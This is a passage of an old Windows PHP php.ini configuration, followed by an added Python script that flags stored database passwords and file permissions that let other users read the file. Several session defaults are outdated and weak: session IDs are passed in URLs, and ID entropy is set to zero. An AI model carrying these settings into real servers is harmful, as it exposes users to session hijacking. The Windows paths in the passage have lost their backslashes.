sybct.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
sybct.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
sybct.min_server_severity = 10 ; Minimum severity of errors displayed
sybct.min_client_severity = 10 ; Minimum severity of displayed messages
[bcmath]
bcmath.scale = 0 ; number of decimal digits for all bcmath functions
[browscap]
;browscap = extra/browscap.ini
browscap = C:WINSYSTEMinetsrvbrowscap.ini
[Informix]
ifx.default_host = ; The host used by ifx_connect() by default (invalid in safe mode)
ifx.default_user = ; The default user name used by ifx_connect() (invalid in safe mode)
ifx.default_password = ; the default password used by ifx_connect() (invalid in safe mode)
ifx.allow_persistent = On ; Allow or disable persistent connections
ifx.max_persistent = -1 ; Maximum number of persistent connections. -1 means unlimited
ifx.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
ifx.textasvarchar = 0 ; If turned on, select statements return the contents of a 'text blob' field instead of its id
ifx.byteasvarchar = 0 ; If turned on, select statements return the contents of a 'byte blob' field instead of its id
ifx.charasvarchar = 0 ; If turned on, trailing whitespace is stripped from fixed-length character columns.
; May be useful for Informix SE users.
ifx.blobinfile = 0 ; If turned on, the contents of text and byte blobs are written to a file
; instead of being kept in memory.
ifx.nullformat = 0 ; NULL is returned as an empty field unless this is set to 1.
; In that case (1), NULL is returned as the string NULL.
[Session]
session.save_handler = files ; Handler used to store/retrieve data
session.save_path = C:wintemp ; Argument passed to the handler; when save_handler is set to files,
; this is the path where the data files will be saved.
session.use_cookies = 1; Whether to use cookies
session.name = PHPSESSID
; The name of the session to use in the cookie
session.auto_start = 0 ; Initialize session when request starts
session.cookie_lifetime = 0 ; Lifetime of the cookie in seconds,
; or 0 to keep it until the browser is restarted
session.cookie_path = / ; Valid path of cookie
session.cookie_domain = ; Valid domain of cookie
session.serialize_handler = php ; Handler used to serialize data
; php is the standard serializer of PHP.
session.gc_probability = 1 ; Percentage probability that the 'garbage collection' process
; is started each time a session is initialized.
session.gc_maxlifetime = 1440 ; After this number of seconds, saved data is considered
; 'garbage' and cleaned up by the gc process.
session.referer_check = ; Check the HTTP Referer to invalidate externally stored URLs containing ids
session.entropy_length = 0 ; How many bytes to read from the file
session.entropy_file = ; The file specified here is used to create the session id
; session.entropy_length = 16
; session.entropy_file = /dev/urandom
session.cache_limiter = nocache ; Set to {nocache, private, public} to determine
; HTTP caching behaviour
session.cache_expire = 180 ; The document expires after n minutes
session.use_trans_sid = 1 ; Use transparent SID support, if enabled at compile time with
; --enable-trans-sid
url_rewriter.tags = "a=href,area=href,frame=src,input=src,form=fakeentry"
[MSSQL]
;extension=php_mssql.dll
mssql.allow_persistent = On ; Allow or disable persistent connections
mssql.max_persistent = -1; Maximum number of persistent connections. -1 means unlimited
mssql.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
mssql.min_error_severity = 10 ; Minimum severity of errors displayed
mssql.min_message_severity = 10 ; Minimum severity of displayed messages
mssql.compatability_mode = Off ; Compatibility mode with older versions of PHP 3.0.
[Assertion]
;assert.active = On ; assert(expr); active by default
;assert.warning = On ; issue a PHP warning for each failed assertion.
;assert.bail = Off ; don't bail out by default.
;assert.callback = 0 ; user-function to be called if an assertion fails.
;assert.quiet_eval = 0 ; eval the expression with current error_reporting(). set to true if you want error_reporting(0) around the eval().
[Ingres II]
ii.allow_persistent = On ; Allow or disable persistent connections
ii.max_persistent = -1; The maximum number of persistent connections. -1 means unlimited
ii.max_links = -1 ; Maximum number of connections (persistent and non-persistent). -1 means unlimited
ii.default_database = ; Default database (format: [node_id::]dbname[/srv_class])
ii.default_user = ; Default user
ii.default_password = ; Default password
[Verisign Payflow Pro]
pfpro.defaulthost = "test.signio.com" ; Default Signio server
pfpro.defaultport = 443; Default port for connection
pfpro.defaulttimeout = 30 ; Default timeout in seconds
; pfpro.proxyaddress = ; Default proxy IP address (if required)
; pfpro.proxyport = ; Default proxy port
; pfpro.proxylogon = ; Default proxy login (logon username)
; pfpro.proxypassword = ; Default proxy password
[Sockets]
sockets.use_system_read = On ; Use the system's read() function instead of the php_read() wrapper
; Local Variables:
; tab-width: 4
; End:
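The warning in the [MySQL] section of the listing above (a password stored in php.ini can be shown by any PHP user and read by anyone with read access to the file) can be turned into a check. The following is an added example, not part of the original listing: the function names and the sample values are constructed, and matching on directive names that end in "password" is an assumption that covers mysql.default_password, ifx.default_password, ii.default_password and pfpro.proxypassword.

```python
import os
import re
import stat
SECRET_KEY = re.compile(r"(password|passwd)$", re.I)  # e.g. mysql.default_password
DIRECTIVE = re.compile(r"^([A-Za-z_][\w.]*)\s*=\s*(.*)$")

def strip_comment(value):
    """Drop a trailing '; comment' unless the ';' sits inside double quotes."""
    out, quoted = [], False
    for ch in value:
        if ch == '"':
            quoted = not quoted
        elif ch == ";" and not quoted:
            break
        out.append(ch)
    return "".join(out).strip().strip('"')

def find_stored_secrets(ini_text):
    """Return (line_no, section, directive) per active, non-empty password; never the value."""
    findings, section = [], ""
    for no, raw in enumerate(ini_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or commented-out directive
        if line.startswith("[") and "]" in line:
            section = line[1:line.index("]")]
            continue
        m = DIRECTIVE.match(line)
        if m and SECRET_KEY.search(m.group(1)) and strip_comment(m.group(2)):
            findings.append((no, section, m.group(1)))
    return findings

def readable_by_others(path):
    """True if the file mode grants read access to group or other."""
    return bool(os.stat(path).st_mode & (stat.S_IRGRP | stat.S_IROTH))

# Constructed sample, not taken from a real server.
SAMPLE = """[MySQL]
mysql.default_password = "s3;cret" ; constructed value with ';' inside quotes
[Informix]
ifx.default_password = ; empty, nothing stored
[Ingres II]
ii.default_password = hunter2
; pfpro.proxypassword = commented-out, inactive
"""

if __name__ == "__main__":
    for no, section, key in find_stored_secrets(SAMPLE):
        print(f"line {no}: [{section}] {key} holds a stored credential")
```

Run find_stored_secrets() on the text of the deployed php.ini and readable_by_others() on its path; a finding from either means the credential belongs in application configuration with tighter permissions.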